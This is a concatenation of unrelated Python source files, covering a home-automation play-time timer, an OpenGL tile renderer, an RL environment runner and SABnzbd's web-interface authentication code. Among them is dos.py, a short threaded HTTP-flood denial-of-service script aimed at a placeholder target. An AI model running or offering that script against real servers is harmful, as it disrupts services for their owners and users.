ServiceTaskConsumer(args.name, args.queue, args.max_workers,
operation_registry=operation_registry),
]
return AMQPConnection(handlers=handlers,
name=args.name,
connect_timeout=None)
def main():
global logger
parser = argparse.ArgumentParser()
parser.add_argument('--queue')
parser.add_argument('--max-workers', default=DEFAULT_MAX_WORKERS, type=int)
parser.add_argument('--name')
parser.add_argument('--hooks-queue')
args = parser.parse_args()
if args.name:
_setup_excepthook(args.name)
logger = logging.getLogger('worker.{0}'.format(args.name))
setup_agent_logger(args.name)
while True:
worker = make_amqp_worker(args)
try:
worker.consume()
except Exception:
logger.exception('Error while reading from rabbitmq')
time.sleep(1)
if __name__ == '__main__':
main()
|
PowerUsageService.py
|
# -*- coding: utf-8 -*-
'''
@author: davandev
'''
import logging
import os
import traceback
import sys
import time
import davan.util.timer_functions as timer_functions
import davan.util.helper_functions as helper
import davan.config.config_creator as configuration
import davan.util.constants as constants
from davan.http.service.reoccuring_base_service import ReoccuringBaseService
from threading import Thread,Event
class PowerUsageService(ReoccuringBaseService):
'''
Monitor usage of a device controlled by a powerplug.
'''
def __init__(self, service_provider, config):
'''
Constructor
'''
ReoccuringBaseService.__init__(self,constants.POWER_USAGE_SERVICE_NAME, service_provider, config)
self.logger = logging.getLogger(os.path.basename(__file__))
self.start_time =""
self.stop_time= ""
self.configured_usage_time = 3600
self.local_event = None
self.timeleft = self.configured_usage_time
self.actual_usage_time = 0
self.current_status = "Off"
def get_next_timeout(self):
'''
Return time until next timeout, only once per day.
'''
self.time_to_next_event = timer_functions.calculate_time_until_midnight()
self.logger.debug("Next timeout in " + str(self.time_to_next_event) + " seconds")
return self.time_to_next_event
def handle_timeout(self):
'''
Reset the time to play every night
'''
self.logger.info("Resetting play monitor")
self.timeleft = self.configured_usage_time
self.actual_usage_time = 0
def handle_request(self, msg):
'''
Handle an incoming power plug state request ("On"/"Off").
'''
try:
self.increment_invoked()
state = self.parse_request(msg)
self.logger.debug("State = " + state)
if state.lower() == "on":
self.start_count_down()
else:
self.stop_count_down()
except:
self.logger.error(traceback.format_exc())
self.increment_errors()
self.logger.error("Failed to handle power usage request")
return constants.RESPONSE_NOT_OK, constants.MIME_TYPE_HTML, constants.RESPONSE_FAILED_TO_PARSE_REQUEST
return constants.RESPONSE_OK, constants.MIME_TYPE_HTML, constants.RESPONSE_EMPTY_MSG
def start_count_down(self):
self.logger.info("Starting timer, time left [ "+str(self.timeleft)+" ]")
self.current_status = "On"
self.local_event = Event()
self.start_time = time.time()
def countdown():
try:
self.increment_invoked()
while not self.local_event.wait(self.timeleft):
self.time_is_out()
except:
self.logger.error(traceback.format_exc())
self.increment_errors()
Thread(target=countdown).start()
return self.local_event.set
def stop_count_down(self):
'''
Manual stop of count down
'''
self.logger.info("Stopping timer")
self.local_event.set()
self.current_status = "Off"
self.stop_time = time.time()
diff = self.stop_time - self.start_time
if diff < self.timeleft:
self.timeleft -= diff
else:
self.timeleft = 0
self.actual_usage_time += diff
self.logger.debug("Time left[ " + str(self.timeleft) + " ] Usage time[" + str(self.actual_usage_time) + "]")
def time_is_out(self):
'''
Callback function when time is out
'''
self.logger.info("Time is out!")
self.local_event.set()
self.timeleft = 0
self.actual_usage_time = self.configured_usage_time
# Restart time measurement when timeleft == 0
self.start_time = time.time()
msg = "Viggo har nu använt upp all sin speltid"
helper.send_telegram_message(self.config, msg)
self.services.get_service(constants.TTS_SERVICE_NAME).start(
helper.encode_message(msg), constants.SPEAKER_KITCHEN)
def parse_request(self, msg):
'''
Return camera name from received msg.
'''
self.logger.debug("Parsing: " + msg )
msg = msg.replace("/PowerUsageService?device=1&state=", "")
return msg
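# Example (taken from the __main__ block below):
#     parse_request("/PowerUsageService?device=1&state=On") -> "On"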
def has_html_gui(self):
"""
Override if service has gui
"""
return True
def get_html_gui(self, column_id):
"""
Override and provide gui
"""
if self.actual_usage_time > 60:
usage = str(self.actual_usage_time/60)
else:
usage = self.actual_usage_time
column = constants.COLUMN_TAG.replace("<COLUMN_ID>", str(column_id))
column = column.replace("<SERVICE_NAME>", self.service_name)
column = column.replace("<SERVICE_VALUE>", "Status: " + str(self.current_status) + "\nTime left: " + str(self.timeleft) + "\nActual usage: "+str(usage))
return column
def get_announcement(self):
'''
Compose and encode announcement data
'''
self.logger.info("Create powerusage announcement")
announcement = "Viggo, du har "
announcement += str(self.timeleft)
announcement += " sekunder kvar att spela idag"
announcement = " och du har spelat totalt"
announcement += str(self.timeleft/60)
announcement += " minuter idag "
return helper.encode_message(announcement)
if __name__ == '__main__':
import time
from davan.util import application_logger as log_config
config = configuration.create()
log_config.start_logging(config['LOGFILE_PATH'],loglevel=4)
test = PowerUsageService("",config)
test.handle_request("/PowerUsageService?device=1&state=On")
time.sleep(90)
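    # Illustrative addition (not part of the original test): turn the plug off again
    # so stop_count_down() recalculates the remaining play time.
    test.handle_request("/PowerUsageService?device=1&state=Off")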
|
tiled.py
|
import time
from pathlib import Path
from collections import deque
from typing import Optional
import numpy as np
from lib.opengl.core.base import *
from lib.opengl import *
from lib.opengl.postproc import PostProcNode
from lib.gen.automaton import ClassicAutomaton
ASSET_PATH = Path(__file__).resolve().parent.parent.parent / "assets"
def create_render_settings() -> RenderSettings:
return RenderSettings(
640, 400,
#mag_filter=gl.GL_NEAREST,
)
class WangEdge2:
TOP = 1
RIGHT = 2
BOTTOM = 4
LEFT = 8
STRINGS = {
TOP: "T",
RIGHT: "R",
BOTTOM: "B",
LEFT: "L",
}
# (y, x)
OFFSET = {
TOP: (-1, 0),
RIGHT: (0, 1),
BOTTOM: (1, 0),
LEFT: (0, -1),
}
IDX_TO_TILE = {
0: 0,
TOP: 4,
RIGHT: 1,
BOTTOM: 12,
LEFT: 3,
TOP | RIGHT: 5,
TOP | LEFT: 7,
BOTTOM | RIGHT: 13,
BOTTOM | LEFT: 15,
TOP | BOTTOM: 8,
LEFT | RIGHT: 2,
LEFT | BOTTOM | RIGHT: 14,
LEFT | TOP | RIGHT: 6,
TOP | BOTTOM | RIGHT: 9,
TOP | BOTTOM | LEFT: 11,
TOP | RIGHT | BOTTOM | LEFT: 10,
}
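    # Example: a cell whose top and right neighbours are set has edge index
    # TOP | RIGHT == 3, which IDX_TO_TILE maps to tile 5 in the 4x4 Wang tile sheet.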
@classmethod
def tile_idx_to_string(cls, tile: int) -> str:
s = []
for key, name in cls.STRINGS.items():
if tile & key:
s.append(name)
return ",".join(s)
@classmethod
def get_tile_map(cls, map: np.ndarray) -> np.ndarray:
h, w = map.shape
tmap = np.ndarray(map.shape, dtype="int32")
tmap.fill(cls.IDX_TO_TILE[0])
for y in range(h):
for x in range(w):
if map[y][x]:
tile_idx = cls.TOP | cls.RIGHT | cls.BOTTOM | cls.LEFT
else:
tile_idx = 0
for key, offset in cls.OFFSET.items():
my = y + offset[0]
mx = x + offset[1]
if my >= h:
my = h - my
if mx >= w:
mx = w - mx
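                    # At the lower/right border my or mx becomes h or w and is wrapped
                    # to 0 above; at the upper/left border they become -1, which Python's
                    # negative indexing wraps to the opposite edge automatically.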
tile_idx |= key * int(map[my][mx])
# print(x, y, cls.tile_idx_to_string(tile_idx))
if tile_idx in cls.IDX_TO_TILE:
tmap[y][x] = cls.IDX_TO_TILE[tile_idx]
return tmap
class Map:
def __init__(
self,
width: int,
height: int,
preset: Optional[dict] = None,
):
preset = dict() if preset is None else preset
self.width = width
self.height = height
self._preset = preset
self.automaton = ClassicAutomaton(
width=self.width,
height=self.height,
born=preset.get("born") or {1, 2, 3},
survive=preset.get("survive") or {6},
)
#self.binary_map: np.ndarray = np.zeros([self.height, self.width])
@property
def binary_map(self) -> np.ndarray:
return self.automaton.cells
def tile_map(self) -> np.ndarray:
return WangEdge2.get_tile_map(self.binary_map)
def init_random(self):
self.automaton.init_random(
probability=self._preset.get("probability") or .3,
seed=self._preset.get("seed") or 23,
)
def step(self, count: int = 1):
for i in range(count):
self.automaton.step()
if False:
# smoothing the map
            self.automaton.born = set()
            self.automaton.survive = {3, 4, 5, 6, 7, 8}
            for i in range(5):
                self.automaton.step()
class TiledMapNode(PostProcNode):
def __init__(self, map: Map, name: str = "tiled"):
super().__init__(name)
self.map = map
self.map_texture = Texture2D()
self.last_step_time = 0
self.queue = deque()
#self.map_thread = Thread(target=self._map_thread_loop)
#self.map_thread.start()
def get_code(self):
return """
#line 160
const ivec2 tile_size = ivec2(32, 32);
const ivec2 tile_map_size = ivec2(4, 4);
vec2 rotate(in vec2 v, in float degree) {
float sa = sin(degree), ca = cos(degree);
return vec2(
v.x * ca - v.y * sa,
v.x * sa + v.y * ca
);
}
//vec4 tile_texture(int tile_idx,
void mainImage(out vec4 fragColor, in vec2 fragCoord, in vec2 texCoord) {
vec2 uv = (fragCoord / u_resolution.y);
uv.x -= .5 * u_resolution.y / u_resolution.x;
vec2 map_pos_f = uv;
map_pos_f = rotate(map_pos_f - .5, sin(u_time)*0.02) + .5;
map_pos_f *= 10. + 5. * sin(u_time/3.);
map_pos_f.y -= u_time * .9;
ivec2 map_pos = ivec2(map_pos_f);
map_pos.y = 20 - map_pos.y;
ivec4 map = ivec4(texelFetch(u_tex4, map_pos, 0));
vec2 tile_pos = fract(map_pos_f);
// when using bilinear mag filter, this is needed
//tile_pos = tile_pos * (float(tile_size - 1.) + .5) / float(tile_size);
//int tile_idx = int(map_pos.y + map_pos.x) % (tile_map_size.x * tile_map_size.y);
int tile_idx = map.x;
tile_pos += vec2(tile_idx % tile_map_size.x, (tile_idx / tile_map_size.x));
fragColor = texture(u_tex1, tile_pos / tile_map_size);
//fragColor = texture(u_tex2, uv);
if (uv.x < 0. || uv.x > 1. || uv.y < 0. || uv.y > 1.)
fragColor.xyz *= 0.1;
}
"""
def num_multi_sample(self) -> int:
return 32
def has_depth_output(self) -> bool:
return False
def create(self, render_settings: RenderSettings):
super().create(render_settings)
self.map.step(100)
self.map_texture.create()
self.map_texture.bind()
self._upload_map_tex()
def release(self):
super().release()
self.map_texture.release()
def render(self, rs: RenderSettings, pass_num: int):
self.map_texture.set_active_texture(3)
self.map_texture.bind()
if self.queue:
self._upload_map_tex(self.queue.pop())
#if rs.time - self.last_step_time > 1.:
# self.last_step_time = rs.time
# self.map.step(2)
# self._upload_map_tex()
self.map_texture.set_parameter(gl.GL_TEXTURE_MAG_FILTER, gl.GL_NEAREST)
super().render(rs, pass_num)
def _upload_map_tex(self, float_array: Optional[np.ndarray] = None):
if float_array is None:
float_array = self.map.tile_map().astype("float32")
self.map_texture.upload_numpy(
float_array,
width=self.map.width, input_format=gl.GL_RED, gpu_format=gl.GL_R32F,
)
def _map_thread_loop(self):
while True:
time.sleep(1)
self.map.step(2)
#self._upload_map_tex()
self.queue.append(self.map.tile_map().astype("float32"))
def create_render_graph():
graph = RenderGraph()
tile_tex = graph.add_node(Texture2DNode(
ASSET_PATH /
"w2e_curvy.png"
#"cr31" / "wang2e.png"
#"cr31" / "border.png"
#"cr31" / "quad.png"
#"cr31" / "octal.png"
#"cr31" / "pipe1.png"
#"cr31" / "mininicular.png"
))
map = Map(32, 32)
map.init_random()
print(map.tile_map())
renderer = graph.add_node(TiledMapNode(map))
graph.connect(tile_tex, 0, renderer, mag_filter=gl.GL_NEAREST)
return graph
if __name__ == "__main__":
map = np.array([
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
], dtype=int)
print(map, "\n")
print(WangEdge2.get_tile_map(map))
#print(np.convolve(map.map.flatten(), conv_mask.flatten()).reshape([5, 5]))
|
dos.py
|
import threading
import socket
import time
target= "target ip"
port=80
fake_ip="182.21.20.32"
def dos():
while True:
stream=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
stream.connect((target,port))
stream.sendto((f"GET /{target} HTTP/1.1\r\n").encode("ascii"),(target,port))
stream.sendto((f"Host: {fake_ip}\r\n\r\n").encode('ascii'),(target,port))
stream.close()
for i in range(500):
thread=threading.Thread(target=dos)
time.sleep(4)
thread.start()
|
update_data.py
|
import threading, requests, time
from bot import log
class UpdateData(object):
def __init__(self):
self.unstable_req = None
self.req = None
self.results = None
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
log("Update Data daemon started.")
        while True:
            try:
                self.unstable_req = requests.get('https://api.covid19api.com/summary')
                if 199 < self.unstable_req.status_code < 300:
                    self.req = self.unstable_req
                    self.results = self.req.json()
                else:
                    log("Covid data failed to update, response code {}".format(self.unstable_req.status_code))
            except requests.RequestException as exc:
                # A transient network error should not kill the daemon thread
                log("Covid data failed to update: {}".format(exc))
            time.sleep(30)
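# Minimal usage sketch (an assumption, not part of the original module): create the
# updater once and poll .results after the daemon has had time to fetch.
if __name__ == '__main__':
    data = UpdateData()
    time.sleep(35)  # allow at least one fetch cycle
    if data.results:
        print(list(data.results.keys()))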
|
_env_runner.py
|
import copy
import logging
import os
import time
from multiprocessing import Process, Manager
from typing import Any
import numpy as np
from yarr.agents.agent import Agent
from yarr.envs.env import Env
from yarr.utils.rollout_generator import RolloutGenerator
from multiprocessing import get_start_method, set_start_method
try:
if get_start_method() != 'spawn':
set_start_method('spawn', force=True)
except RuntimeError:
pass
class _EnvRunner(object):
def __init__(self,
train_env: Env,
eval_env: Env,
agent: Agent,
timesteps: int,
train_envs: int,
eval_envs: int,
episodes: int,
episode_length: int,
kill_signal: Any,
step_signal: Any,
rollout_generator: RolloutGenerator,
save_load_lock,
current_replay_ratio,
target_replay_ratio,
weightsdir: str = None,
):
self._train_env = train_env
self._eval_env = eval_env
self._agent = agent
self._train_envs = train_envs
self._eval_envs = eval_envs
self._episodes = episodes
self._episode_length = episode_length
self._rollout_generator = rollout_generator
self._weightsdir = weightsdir
self._previous_loaded_weight_folder = ''
self._timesteps = timesteps
self._p_args = {}
self.p_failures = {}
manager = Manager()
self.write_lock = manager.Lock()
self.stored_transitions = manager.list()
self.agent_summaries = manager.list()
self._kill_signal = kill_signal
self._step_signal = step_signal
self._save_load_lock = save_load_lock
self._current_replay_ratio = current_replay_ratio
self._target_replay_ratio = target_replay_ratio
def restart_process(self, name: str):
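        # Re-spawn a worker that was originally created by spin_up_envs(), reusing
        # the (name, eval) arguments recorded in self._p_args.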
p = Process(target=self._run_env, args=self._p_args[name], name=name)
p.start()
return p
def spin_up_envs(self, name: str, num_envs: int, eval: bool):
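        # Start `num_envs` rollout worker processes; each gets a unique name so a
        # crashed worker can later be re-created via restart_process().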
ps = []
for i in range(num_envs):
n = name + str(i)
self._p_args[n] = (n, eval)
self.p_failures[n] = 0
p = Process(target=self._run_env, args=self._p_args[n], name=n)
p.start()
ps.append(p)
return ps
def _load_save(self):
if self._weightsdir is None:
logging.info("'weightsdir' was None, so not loading weights.")
return
while True:
weight_folders = []
with self._save_load_lock:
if os.path.exists(self._weightsdir):
weight_folders = os.listdir(self._weightsdir)
if len(weight_folders) > 0:
weight_folders = sorted(map(int, weight_folders))
# Only load if there has been a new weight saving
if self._previous_loaded_weight_folder != weight_folders[-1]:
self._previous_loaded_weight_folder = weight_folders[-1]
d = os.path.join(self._weightsdir, str(weight_folders[-1]))
try:
self._agent.load_weights(d)
except FileNotFoundError:
# Rare case when agent hasn't finished writing.
time.sleep(1)
self._agent.load_weights(d)
logging.info('Agent %s: Loaded weights: %s' % (self._name, d))
break
logging.info('Waiting for weights to become available.')
time.sleep(1)
def _get_type(self, x):
if x.dtype == np.float64:
return np.float32
return x.dtype
def _run_env(self, name: str, eval: bool):
self._name = name
self._agent = copy.deepcopy(self._agent)
self._agent.build(training=False)
logging.info('%s: Launching env.' % name)
np.random.seed()
logging.info('Agent information:')
logging.info(self._agent)
env = self._train_env
if eval:
env = self._eval_env
env.eval = eval
env.launch()
for ep in range(self._episodes):
self._load_save()
logging.debug('%s: Starting episode %d.' % (name, ep))
episode_rollout = []
generator = self._rollout_generator.generator(
self._step_signal, env, self._agent,
self._episode_length, self._timesteps, eval)
try:
for replay_transition in generator:
while True:
if self._kill_signal.value:
env.shutdown()
return
if (eval or self._target_replay_ratio is None or
self._step_signal.value <= 0 or (
self._current_replay_ratio.value >
self._target_replay_ratio)):
break
time.sleep(1)
logging.debug(
'Agent. Waiting for replay_ratio %f to be more than %f' %
(self._current_replay_ratio.value, self._target_replay_ratio))
with self.write_lock:
if len(self.agent_summaries) == 0:
# Only store new summaries if the previous ones
# have been popped by the main env runner.
for s in self._agent.act_summaries():
self.agent_summaries.append(s)
episode_rollout.append(replay_transition)
            except StopIteration:
continue
except Exception as e:
env.shutdown()
raise e
with self.write_lock:
for transition in episode_rollout:
self.stored_transitions.append((name, transition, eval))
env.shutdown()
def kill(self):
self._kill_signal.value = True
|
interface.py
|
#!/usr/bin/python3 -OO
# Copyright 2007-2019 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.interface - webinterface
"""
import os
import time
import cherrypy
import logging
import urllib.request, urllib.parse, urllib.error
import json
import re
import hashlib
import socket
import ssl
import functools
from threading import Thread
from random import randint
from xml.sax.saxutils import escape
import sabnzbd
import sabnzbd.rss
import sabnzbd.scheduler as scheduler
from Cheetah.Template import Template
from sabnzbd.misc import to_units, from_units, time_format, calc_age, \
int_conv, get_base_url, probablyipv4, probablyipv6
from sabnzbd.filesystem import real_path, long_path, globber, globber_full, remove_all, \
clip_path, same_file
from sabnzbd.newswrapper import GetServerParms
from sabnzbd.bpsmeter import BPSMeter
from sabnzbd.encoding import xml_name, utob
import sabnzbd.config as config
import sabnzbd.cfg as cfg
import sabnzbd.notifier as notifier
import sabnzbd.newsunpack
from sabnzbd.downloader import Downloader
from sabnzbd.nzbqueue import NzbQueue
from sabnzbd.utils.servertests import test_nntp_server_dict
from sabnzbd.decoder import SABYENC_ENABLED
from sabnzbd.utils.diskspeed import diskspeedmeasure
from sabnzbd.utils.getperformance import getpystone
from sabnzbd.utils.internetspeed import internetspeed
from sabnzbd.constants import NORMAL_PRIORITY, MEBI, DEF_SKIN_COLORS, \
DEF_STDCONFIG, DEF_MAIN_TMPL, DEFAULT_PRIORITY, CHEETAH_DIRECTIVES
from sabnzbd.lang import list_languages
from sabnzbd.api import list_scripts, list_cats, del_from_section, \
api_handler, build_queue, build_status, \
retry_job, retry_all_jobs, build_header, build_history, del_job_files, \
format_bytes, report, del_hist_job, Ttemplate, build_queue_header, \
_api_test_email, _api_test_notif
##############################################################################
# Global constants
##############################################################################
##############################################################################
# Security functions
##############################################################################
def secured_expose(wrap_func=None, check_configlock=False, check_session_key=False):
""" Wrapper for both cherrypy.expose and login/access check """
if not wrap_func:
return functools.partial(secured_expose, check_configlock=check_configlock, check_session_key=check_session_key)
# Expose to cherrypy
wrap_func.exposed = True
@functools.wraps(wrap_func)
def internal_wrap(*args, **kwargs):
# Add X-Frame-Headers headers to page-requests
if cfg.x_frame_options():
cherrypy.response.headers['X-Frame-Options'] = 'SameOrigin'
# Check if config is locked
if check_configlock and cfg.configlock():
cherrypy.response.status = 403
return 'Access denied - Configuration locked'
# Check if external access
if not check_access():
cherrypy.response.status = 403
return 'Access denied'
# Verify login status, only for non-key pages
if not check_login() and not check_session_key:
raise Raiser('/login/')
# Verify host used for the visit
if not check_hostname():
cherrypy.response.status = 403
return 'Access denied - Hostname verification failed: https://sabnzbd.org/hostname-check'
# Some pages need correct session key
if check_session_key:
msg = check_session(kwargs)
if msg:
return msg
# All good, cool!
return wrap_func(*args, **kwargs)
return internal_wrap
def check_access(access_type=4):
""" Check if external address is allowed given access_type:
1=nzb
2=api
3=full_api
4=webui
5=webui with login for external
"""
referrer = cherrypy.request.remote.ip
# CherryPy will report ::ffff:192.168.0.10 on dual-stack situation
# It will always contain that ::ffff: prefix
range_ok = not cfg.local_ranges() or bool([1 for r in cfg.local_ranges() if (referrer.startswith(r) or referrer.replace('::ffff:', '').startswith(r))])
allowed = referrer in ('127.0.0.1', '::ffff:127.0.0.1', '::1') or range_ok or access_type <= cfg.inet_exposure()
if not allowed:
logging.debug('Refused connection from %s', referrer)
return allowed
def check_hostname():
""" Check if hostname is allowed, to mitigate DNS-rebinding attack.
Similar to CVE-2019-5702, we need to add protection even
if only allowed to be accessed via localhost.
"""
    # If login is enabled, the API key cannot be deduced via DNS-rebinding, so skip the check
if cfg.username() and cfg.password():
return True
# Don't allow requests without Host
host = cherrypy.request.headers.get('Host')
if not host:
return False
# Remove the port-part (like ':8080'), if it is there, always on the right hand side.
# Not to be confused with IPv6 colons (within square brackets)
host = re.sub(':[0123456789]+$', '', host).lower()
# Fine if localhost or IP
if host == 'localhost' or probablyipv4(host) or probablyipv6(host):
return True
# Check on the whitelist
if host in cfg.host_whitelist():
return True
# Fine if ends with ".local" or ".local.", aka mDNS name
# See rfc6762 Multicast DNS
if host.endswith(('.local', '.local.')):
return True
# Ohoh, bad
log_warning_and_ip(T('Refused connection with hostname "%s" from:') % host)
return False
# Create a more unique ID for each instance
COOKIE_SECRET = str(randint(1000,100000)*os.getpid())
def set_login_cookie(remove=False, remember_me=False):
""" We try to set a cookie as unique as possible
        to the current user, based on its IP, the
current process ID of the SAB instance and a random
number, so cookies cannot be re-used
"""
salt = randint(1, 1000)
cookie_str = utob(str(salt) + cherrypy.request.remote.ip + COOKIE_SECRET)
cherrypy.response.cookie['login_cookie'] = hashlib.sha1(cookie_str).hexdigest()
cherrypy.response.cookie['login_cookie']['path'] = '/'
cherrypy.response.cookie['login_cookie']['httponly'] = 1
cherrypy.response.cookie['login_salt'] = salt
cherrypy.response.cookie['login_salt']['path'] = '/'
cherrypy.response.cookie['login_salt']['httponly'] = 1
# If we want to be remembered
if remember_me:
cherrypy.response.cookie['login_cookie']['max-age'] = 3600*24*14
cherrypy.response.cookie['login_salt']['max-age'] = 3600*24*14
# To remove
if remove:
cherrypy.response.cookie['login_cookie']['expires'] = 0
cherrypy.response.cookie['login_salt']['expires'] = 0
else:
# Notify about new login
notifier.send_notification(T('User logged in'), T('User logged in to the web interface'), 'new_login')
def check_login_cookie():
# Do we have everything?
if 'login_cookie' not in cherrypy.request.cookie or 'login_salt' not in cherrypy.request.cookie:
return False
cookie_str = utob(str(cherrypy.request.cookie['login_salt'].value) + cherrypy.request.remote.ip + COOKIE_SECRET)
return cherrypy.request.cookie['login_cookie'].value == hashlib.sha1(cookie_str).hexdigest()
def check_login():
# Not when no authentication required or basic-auth is on
if not cfg.html_login() or not cfg.username() or not cfg.password():
return True
    # If the login page is shown for external IPs (inet_exposure 5), access_type=6
    # effectively checks whether the request comes from a local address
if cfg.inet_exposure() == 5 and check_access(access_type=6):
return True
# Check the cookie
return check_login_cookie()
def get_users():
users = {cfg.username(): cfg.password()}
return users
def encrypt_pwd(pwd):
return pwd
def set_auth(conf):
""" Set the authentication for CherryPy """
if cfg.username() and cfg.password() and not cfg.html_login():
conf.update({'tools.auth_basic.on': True, 'tools.auth_basic.realm': 'SABnzbd',
'tools.auth_basic.users': get_users, 'tools.auth_basic.encrypt': encrypt_pwd})
conf.update({'/api': {'tools.auth_basic.on': False},
'%s/api' % cfg.url_base(): {'tools.auth_basic.on': False},
})
else:
conf.update({'tools.auth_basic.on': False})
def check_session(kwargs):
""" Check session key """
if not check_access():
return 'Access denied'
key = kwargs.get('session')
if not key:
key = kwargs.get('apikey')
msg = None
if not key:
log_warning_and_ip(T('Missing Session key'))
msg = T('Error: Session Key Required')
elif key != cfg.api_key():
log_warning_and_ip(T('Error: Session Key Incorrect'))
msg = T('Error: Session Key Incorrect')
return msg
def check_apikey(kwargs, nokey=False):
""" Check api key or nzbkey
Return None when OK, otherwise an error message
"""
output = kwargs.get('output')
mode = kwargs.get('mode', '')
name = kwargs.get('name', '')
# Lookup required access level
req_access = sabnzbd.api.api_level(mode, name)
if req_access == 1 and check_access(1):
# NZB-only actions
pass
elif not check_access(req_access):
return report(output, 'Access denied')
# First check APIKEY, if OK that's sufficient
if not (cfg.disable_key() or nokey):
key = kwargs.get('apikey')
if not key:
key = kwargs.get('session')
if not key:
if cfg.api_warnings():
log_warning_and_ip(T('API Key missing, please enter the api key from Config->General into your 3rd party program:'))
return report(output, 'API Key Required')
elif req_access == 1 and key == cfg.nzb_key():
return None
elif key == cfg.api_key():
return None
else:
log_warning_and_ip(T('API Key incorrect, Use the api key from Config->General in your 3rd party program:'))
return report(output, 'API Key Incorrect')
# No active APIKEY, check web credentials instead
if cfg.username() and cfg.password():
if check_login() or (kwargs.get('ma_username') == cfg.username() and kwargs.get('ma_password') == cfg.password()):
pass
else:
if cfg.api_warnings():
log_warning_and_ip(T('Authentication missing, please enter username/password from Config->General into your 3rd party program:'))
return report(output, 'Missing authentication')
return None
def log_warning_and_ip(txt):
""" Include the IP and the Proxy-IP for warnings """
# Was it proxy forwarded?
xff = cherrypy.request.headers.get('X-Forwarded-For')
if xff:
txt = '%s %s (X-Forwarded-For: %s)>%s' % (txt, cherrypy.request.remote.ip, xff, cherrypy.request.headers.get('User-Agent', '??'))
else:
txt = '%s %s>%s' % (txt, cherrypy.request.remote.ip, cherrypy.request.headers.get('User-Agent', '??'))
logging.warning('%s', txt)
##############################################################################
# Helper raiser functions
##############################################################################
def Raiser(root='', **kwargs):
args = {}
for key in kwargs:
val = kwargs.get(key)
if val:
args[key] = val
# Add extras
if args:
root = '%s?%s' % (root, urllib.parse.urlencode(args))
# Optionally add the leading /sabnzbd/ (or what the user set)
if not root.startswith(cfg.url_base()):
root = cherrypy.request.script_name + root
# Send the redirect
return cherrypy.HTTPRedirect(root)
def queueRaiser(root, kwargs):
return Raiser(root, start=kwargs.get('start'),
limit=kwargs.get('limit'),
search=kwargs.get('search'))
def rssRaiser(root, kwargs):
return Raiser(root, feed=kwargs.get('feed'))
##############################################################################
# Page definitions
##############################################################################
class MainPage:
def __init__(self):
self.__root = '/'
# Add all sub-pages
self.login = LoginPage()
self.queue = QueuePage('/queue/')
self.history = HistoryPage('/history/')
self.status = Status('/status/')
self.config = ConfigPage('/config/')
self.nzb = NzoPage('/nzb/')
self.wizard = Wizard('/wizard/')
@secured_expose
def index(self, **kwargs):
if not cfg.notified_new_skin() and cfg.web_dir() != 'Glitter':
logging.warning(T('Try our new skin Glitter! Fresh new design that is optimized for desktop and mobile devices. Go to Config -> General to change your skin.'))
if not cfg.notified_new_skin():
cfg.notified_new_skin.set(1)
config.save_config()
if kwargs.get('skip_wizard') or config.get_servers():
info = build_header()
info['scripts'] = list_scripts(default=True)
info['script'] = 'Default'
info['cat'] = 'Default'
info['categories'] = list_cats(True)
info['have_rss_defined'] = bool(config.get_rss())
info['have_watched_dir'] = bool(cfg.dirscan_dir())
# Have logout only with HTML and if inet=5, only when we are external
info['have_logout'] = cfg.username() and cfg.password() and (cfg.html_login() and (cfg.inet_exposure() < 5 or (cfg.inet_exposure() == 5 and not check_access(access_type=6))))
bytespersec_list = BPSMeter.do.get_bps_list()
info['bytespersec_list'] = ','.join([str(bps) for bps in bytespersec_list])
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'main.tmpl'),
searchList=[info], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
else:
# Redirect to the setup wizard
raise cherrypy.HTTPRedirect('%s/wizard/' % cfg.url_base())
@secured_expose(check_session_key=True)
def shutdown(self, **kwargs):
# Check for PID
pid_in = kwargs.get('pid')
if pid_in and int(pid_in) != os.getpid():
return "Incorrect PID for this instance, remove PID from URL to initiate shutdown."
sabnzbd.shutdown_program()
return T('SABnzbd shutdown finished')
@secured_expose(check_session_key=True)
def pause(self, **kwargs):
scheduler.plan_resume(0)
Downloader.do.pause()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def resume(self, **kwargs):
scheduler.plan_resume(0)
sabnzbd.unpause_all()
raise Raiser(self.__root)
@cherrypy.expose
def tapi(self, **kwargs):
""" Handler for API over http, for template use """
msg = check_apikey(kwargs)
if msg:
return msg
return api_handler(kwargs)
@cherrypy.expose
def api(self, **kwargs):
""" Handler for API over http, with explicit authentication parameters """
if cfg.api_logging():
# Was it proxy forwarded?
xff = cherrypy.request.headers.get('X-Forwarded-For')
if xff:
logging.debug('API-call from %s (X-Forwarded-For: %s) [%s] %s', cherrypy.request.remote.ip,
xff, cherrypy.request.headers.get('User-Agent', '??'), kwargs)
else:
logging.debug('API-call from %s [%s] %s', cherrypy.request.remote.ip,
cherrypy.request.headers.get('User-Agent', '??'), kwargs)
mode = kwargs.get('mode', '')
if isinstance(mode, list):
mode = mode[0]
kwargs['mode'] = mode
name = kwargs.get('name', '')
if isinstance(name, list):
name = name[0]
kwargs['name'] = name
if mode not in ('version', 'auth'):
msg = check_apikey(kwargs)
if msg:
return msg
return api_handler(kwargs)
@secured_expose
def scriptlog(self, **kwargs):
""" Duplicate of scriptlog of History, needed for some skins """
# No session key check, due to fixed URLs
name = kwargs.get('name')
if name:
history_db = sabnzbd.get_db_connection()
return ShowString(history_db.get_name(name), history_db.get_script_log(name))
else:
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def retry(self, **kwargs):
""" Duplicate of retry of History, needed for some skins """
job = kwargs.get('job', '')
url = kwargs.get('url', '').strip()
pp = kwargs.get('pp')
cat = kwargs.get('cat')
script = kwargs.get('script')
if url:
sabnzbd.add_url(url, pp, script, cat, nzbname=kwargs.get('nzbname'))
